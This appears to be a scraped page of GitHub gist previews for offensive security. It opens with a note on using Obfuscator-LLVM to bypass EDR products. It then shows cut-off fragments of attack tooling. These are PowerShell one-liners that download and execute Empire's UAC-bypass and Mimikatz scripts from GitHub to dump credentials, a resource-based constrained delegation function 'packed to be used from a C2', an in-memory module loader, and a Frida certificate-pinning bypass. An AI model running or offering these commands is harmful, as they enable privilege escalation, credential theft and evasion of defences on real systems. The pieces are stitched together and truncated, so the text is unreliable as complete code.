Obfuscator-LLVM is a modified version of the LLVM compilers/toolchain to obfuscate source code. This can e.g. be used to bypass EDRs.
Someone might find this useful, since there was no step-by-step instructions on how to correctly compile OLLVM-16.
Required software:
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
| function Invoke-GenericWriteRBCD | |
| { | |
| <# Based on Gist by dirkjan - Packed to be used from a C2 #> | |
| [CmdletBinding()] | |
| param | |
| ( | |
| [Parameter(Mandatory=$True, HelpMessage="The name for the newly created computer")] | |
| [string]$Computer, |
| function New-InMemoryModule | |
| { | |
| Param | |
| ( | |
| [Parameter(Position = 0)] | |
| [ValidateNotNullOrEmpty()] | |
| [String] | |
| $ModuleName = [Guid]::NewGuid().ToString() | |
| ) |
| Java.perform(function() { | |
| console.log('\n[.] Cert Pinning Bypass'); | |
| // Create a TrustManager that trusts everything | |
| console.log('[+] Creating a TrustyTrustManager that trusts everything...'); | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
| var TrustyTrustManager = Java.registerClass({ | |
| name: 'com.example.TrustyTrustManager', | |
| implements: [X509TrustManager], | |
| methods: { |
